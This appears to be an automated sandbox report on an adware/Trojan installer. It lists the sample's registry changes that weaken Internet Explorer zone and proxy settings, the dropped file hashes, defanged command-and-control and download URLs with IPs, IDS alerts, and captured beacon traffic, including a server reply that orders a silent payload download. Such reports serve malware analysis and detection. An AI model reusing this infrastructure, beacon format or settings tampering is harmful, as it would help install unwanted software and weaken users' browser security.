[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"__cxe_type" = ".10100019"
"CAD4DBA9766467bducob23" = "18000000"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"cmpcc" = "UA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"cmpcc_Expiration" = "1441945355227"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE D8 35 F4 E4 60 CD EF 9C B0 F1 DC 25 A7 F1 00"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"AAD4DBA9766467evaob23" = "60000"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"E419E2445BF82ob23" = "300000"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE security zone settings so that all local network hosts with no dots in their name that are not assigned to any other zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings so that all hosts that bypass the proxy are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process taedko.exe:1988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB A5 16 D9 CC AE C9 5D 14 0C DD F9 21 73 C3 6F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE security-zone settings so that all local web nodes with no dots in their names, which are not assigned to any zone, are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process dag17797.exe:552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015090820150909\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CacheOptions" = "11"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CacheLimit" = "8192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CachePrefix" = ":2015090820150909:"

"CacheRepair" = "0"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 3B 7A 7A 17 03 FA 6D 1F B5 6E BA 76 AD 76 E6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE security-zone settings so that all local web nodes with no dots in their names, which are not assigned to any zone, are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014041520140416]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
a28a6aa25d416848937de3b817d49784 c:\Documents and Settings\All Users\Application Data\IlejwTivc\Uninstaller.exe
740c93fdf9dedfffd5c300aeb9c8eba5 c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae3ko.dll
4b0a71b036a1759bd0a9a6d8d7286470 c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae3ko.exe
740c93fdf9dedfffd5c300aeb9c8eba5 c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae3kod.dll
846c526984e6eaf579d6b26b96cbabb9 c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae6ko.dll
59b859426c5cb1f82ca551cdeb3a04ef c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae6ko.exe
846c526984e6eaf579d6b26b96cbabb9 c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae6kod.dll
a005b797c5ebd5bf0d3bff9d9e0e36b0 c:\Documents and Settings\All Users\Application Data\IlejwTivc\taeako.exe
01ee425920c921ca8fbf6710bbb8e705 c:\Documents and Settings\All Users\Application Data\IlejwTivc\taedko.exe
44c191f29f65760a5be1f7a4c7a45c12 c:\Documents and Settings\All Users\Application Data\IlejwTivc\taewko.exe
98d858a74ed18756c6fa5fcb0ee620fd c:\Documents and Settings\All Users\Application Data\IlejwTivc\utils.exe
dae0fba97a137277189223ea9ede1175 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\tmp30731\dag17797.exe
5264f7d6d89d1dc04955cfb391798446 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\GetVersion.dll
b140459077c7c39be4bef249c2f84535 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\Math.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\System.dll
7579ade7ae1747a31960a228ce02e666 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\UserInfo.dll
5afd4a9b7e69e7c6e312b2ce4040394a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\blowfish.dll
94ba775c8a1f4d6c9bb1966eddce22b5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\manlib.dll
fe3f848e2a306d586ab8f5433738d8db c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\nsCBHTML5.dll
c10e04dd4ad4277d5adc951bb331c777 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\nsDialogs.dll
5f13dbc378792f23e598079fc1e4422b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\nsisunz.dll
2b7007ed0262ca02ef69d8990815cbeb c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\registry.dll
febff2c363c7f7664687eefe8253087e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\serlib.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 1.1.0.31
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.1.0.31
File Description:
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23130 23552 4.44841 0bc2ffd32265a08d72b795b18265828d
.rdata 28672 4496 4608 3.59163 f179218a059068529bdb4637ef5fa28e
.data 36864 110488 1024 3.26405 975304d6dd6c4a4f076b15511e2bbbc0
.ndata 147456 77824 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 225280 16944 17408 4.08558 e9d00de7898ae3a42a8383ed8a0b0e7f

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 287
05a7d3434a4f7fdbf0701537409ba2c8
28b85a68ade122e0932bc011d2e4741e
85384e1d38290e1be1b941708ef98de7
90c45221acad769be1f420e26fb96e4e
3e9501bc32b06042e7bcccdf0669fafa
99bbb5f56a0e982061037a96fd219d2e
167d6007985099cb7013fbf1130a54b3
d77835ac151ab2189ea5019f70e1dc9e
c2b1c2a1b9eeb54404eab8ffaac8ab3d
a901bec47b03673fb1dbb3071e83a05f
bcf2db92c2535d1f05c86a8706618c3c
2d6a16c59156f3d26a0161fa787d5ecb
6a17857090567191d9d5407fb1be7a60
14ad705a1481ad0fac61ac3380f71743
4dcc650e7da22e29ee760ae17093af75
63e751baab159c93c34296d8a60d605a
ce32769a77e3a5231c15f461eddfc257
df58c89f399dc0e07adb04521036be4c
e3df55b2211eca7c68f70aff300b5de1
21652c1165a4cc603f5755d9996b329d
083cd9d058cf091f0d2ff94d2183e254
75f54e31f102aa950f332c5557e0b6ae
cee30d0a7c755a06d734276fb2f8b21b
38926abc005c6822d288bee19dc5ed9b
383860ca1a012fc8db9189d1ffb6e360

URLs

URL IP
hxxp://ghs.googlehosted.com/rp/v/image.jpg
hxxp://ghs.googlehosted.com/wrp/ri
hxxp://s3-1.amazonaws.com/client-cmd/cr.html?type=install&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132
hxxp://s3-1.amazonaws.com/client-cmd/cr.html?type=install_reg&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132
hxxp://s3-1.amazonaws.com/client-cmd/cr.html?type=strunner&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686141
hxxp://dildmbfdhsxh6.cloudfront.net/amm/apps/121/10100019/loader.js?x=1&cb=1441686142118&yt=81
hxxp://ghs.googlehosted.com/up/v/update
hxxp://cojun15cart.com/download.php?kHmDdWc=
hxxp://cds.i9x9t3x4.hwcdn.net/testadsreel_10656.exe
hxxp://fcesneim.us/FCL_Co_Unq_remote_v5.php
hxxp://fcesneim.us/DSS_Unq_IMapplication_mon_remote.php
hxxp://cds.i9x9t3x4.hwcdn.net/os/rm/OfferScreen_12_HD.zip
hxxp://cds.i9x9t3x4.hwcdn.net/os/rm/OfferScreen_422.zip
hxxp://dildmbfdhsxh6.cloudfront.net/core/ammapp.js?x=1&cb=1441686154118&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/core/lgv.js?r=9&cb=1441686154352&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/core/v4/cmp_ext.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154415&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/core/v4/dyn/10100019/cxeappconf.js?vcf=1eaf4dc92543ff3d3dd94f691485a287ab&cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154477&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/core/apps/121/v1.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154540&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/amm/plg/ob/ext/ammbg.js?x=1&cb=1441686154587&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/amm/plg/ob/ext/bg/10100019/none/obbgint.js?x=1&cb=1441686154649&yt=81
hxxp://s3.zawss.info/client-cmd/cr.html?type=install_reg&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 54.231.18.192
hxxp://cdn.austries.com/up/v/update 64.233.166.121
hxxp://s.xcodelib.net/amm/plg/ob/ext/bg/10100019/none/obbgint.js?x=1&cb=1441686154649&yt=81 54.230.200.28
hxxp://s10100019.xcodelib.net/amm/apps/121/10100019/loader.js?x=1&cb=1441686142118&yt=81 54.230.200.81
hxxp://www.cojun15cart.com/download.php?kHmDdWc= 23.22.255.164
hxxp://s.xcodelib.net/core/ammapp.js?x=1&cb=1441686154118&yt=81 54.230.200.28
hxxp://secured.nmsgv.us/testadsreel_10656.exe 69.16.175.42
hxxp://s.xcodelib.net/core/apps/121/v1.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154540&yt=81 54.230.200.28
hxxp://s.xcodelib.net/core/lgv.js?r=9&cb=1441686154352&yt=81 54.230.200.28
hxxp://cdn.austries.com/rp/v/image.jpg 64.233.166.121
hxxp://s3.zawss.info/client-cmd/cr.html?type=install&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 54.231.18.192
hxxp://s3.zawss.info/client-cmd/cr.html?type=strunner&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686141 54.231.18.192
hxxp://www.fcesneim.us/FCL_Co_Unq_remote_v5.php 50.97.62.154
hxxp://s.xcodelib.net/amm/plg/ob/ext/ammbg.js?x=1&cb=1441686154587&yt=81 54.230.200.28
hxxp://s.xcodelib.net/core/v4/dyn/10100019/cxeappconf.js?vcf=1eaf4dc92543ff3d3dd94f691485a287ab&cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154477&yt=81 54.230.200.28
hxxp://cdn.austries.com/wrp/ri 64.233.166.121
hxxp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip 69.16.175.42
hxxp://s.xcodelib.net/core/v4/cmp_ext.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154415&yt=81 54.230.200.28
hxxp://secured.nmsgv.us/os/rm/OfferScreen_422.zip 69.16.175.42
hxxp://www.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php 50.97.62.154
www.xcodelib.net 107.21.244.247
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Data POST to an image file (jpg)
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET MALWARE W32/InstallMonetizer.Adware Beacon 2

Traffic

GET /download.php?kHmDdWc= HTTP/1.1
Host: VVV.cojun15cart.com
Connection: Keep-Alive


HTTP/1.1 302 Found
Date: Tue, 08 Sep 2015 04:22:23 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Cache-Control: no-cache, must-revalidate
Content-Disposition: attachment; filename="InstallMonetizer.exe"
Location: hXXp://secured.nmsgv.us/testadsreel_10656.exe
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 400
Connection: Keep-Alive

key=jZKJflaCh4yNeoWFeH+Ch4KMgT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/iIxWcWlMSz+GeoeOVmKHjX6FOVyIi4mIi3qNgoiHeHh4b2aQeot+RTlih3xHP39/Vj98gVY/gn5WT0dJR0tSSUlHTk5KSz+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/kISNhlZKTT98e1ZKTU1KT1FPSk1J&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:17 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Cont
rol: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:1
7 GMT..Server: Google Frontend..Content-Length: 43..GIF89a............
.!.......,...........D..;
....



POST /up/v/update HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 420
Connection: Keep-Alive

key=jZKJflaOiX16jX4/fIeNVkk/iYuPjYZWSUp4SUp4SUt4SUl4SUk/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4iMVnFpTEs/hnqHjlZih41+hTlciIuJiIt6jYKIh3h4eG9mkHqLfkU5Yod8Rz9/f1Y/fIFWP4J+Vk9HSUdLUklJR05OSks/hnp8VklJSVxLUl9dTk5aXT97joJ9VkpJST+QhI2GVkpNP4WNhlZJUXhJUnhJUHhLS3hLTz98e1ZKTU1KT1FPSk1PP5FWTUlR&x=1
HTTP/1.1 200 OK
Content-type: text/plain
Date: Tue, 08 Sep 2015 04:22:22 GMT
Server: Google Frontend
Cache-Control: private
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
86..<runonce><runid>4006WIM20150908</runid><silen
t>yes</silent><url>hXXp://VVV.cojun15cart.com/download.
php?kHmDdWc=</url></runonce>....0..HTTP/1.1 200 OK..Conten
t-type: text/plain..Date: Tue, 08 Sep 2015 04:22:22 GMT..Server: Googl
e Frontend..Cache-Control: private..Accept-Ranges: none..Vary: Accept-
Encoding..Transfer-Encoding: chunked..86..<runonce><runid>
4006WIM20150908</runid><silent>yes</silent><url&g
t;hXXp://VVV.cojun15cart.com/download.php?kHmDdWc=</url></run
once>....0..


GET /core/ammapp.js?x=1&cb=1441686154118&yt=81 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.xcodelib.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 1470
Connection: keep-alive
Date: Mon, 07 Sep 2015 20:21:16 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Tue, 08 Sep 2015 20:21:16 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 29217
X-Cache: Hit from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: OUjlVNVWrwWqS5UHlwhs6jHawXq6NVa9ifQH-SpoIt0RqZCClnuX6A==
...........WkS.8.. A....8...WeX^...-.mg:..,...........{%..CB.e..K:..s_
bDD..../../.F...Q.9.(.w.....9............C......i.i..........O."..~H..
;|....AW..~oo.|....Q.|..{.;..L...S}......S.].<.S........L.e..I.S...
c6.......8.J...O.C..{....{.t._..{......d6.D..U.....3e.o...\<..L.m.O
...d.}[email protected]#.m4...I..).....I..{_...;r.Vh.l.R>.B....h~...^G]...
[email protected].>\Q?.=%...$)...1..c...\.L.......^.d.%......I.._4.or......
x.J'....P...N.j.u....4KC._.F.......-..1....... ..i~70B......B..d.... .
bs..Z}..:.g..o...|...L....5.D~8..uz.Uq..r.u....B...U.....u....e'9\.b..
...K..#.^D\~N.(N...0..:!...?"7.i$..i.....7......~..m.zZ.:...A&U.k....6
n......?.D...%.....U..2....R..@.^......g.N...y..N^.P..q,.5.?...m......
"....|..../.l..I.;.. D.Qu... .`.-...,..Vf.._......L.........I.Z.`i.q..
.2.............1*a..q.....2#.x[m=.9w.<..4DBI....$...........\P....s
..>..l....).>....).........<....U3..R.(....F.4.nn.... EJ.....
..).....).U... ..s........{..;....0..J".A.(..Z...r...|.:S.k..........;
....{....8..m#?..9...C'..<`..1.<<=....1.......;.u...u....t.C.
...6.R.....>...w.!........5.4...l....{....*........r.Z....9......n.
Sf..)]..D..........]f.u...E.....7..=.,.qBhg.&..Z 0...wu.@.....^...3.9.
.LA..])......&%.e/..\../.^.$ .....R..z|MBh.....s` O..V'....9z.5z.Y....
'Y.P..O....'...$'.....o...f.M..o...F..V.tKE.....Si..U..v..4*.$Lp_.U...
s;.........}.._.a....1.N.c.5..*...j..4Q.7.R..............TQ.....M...2f
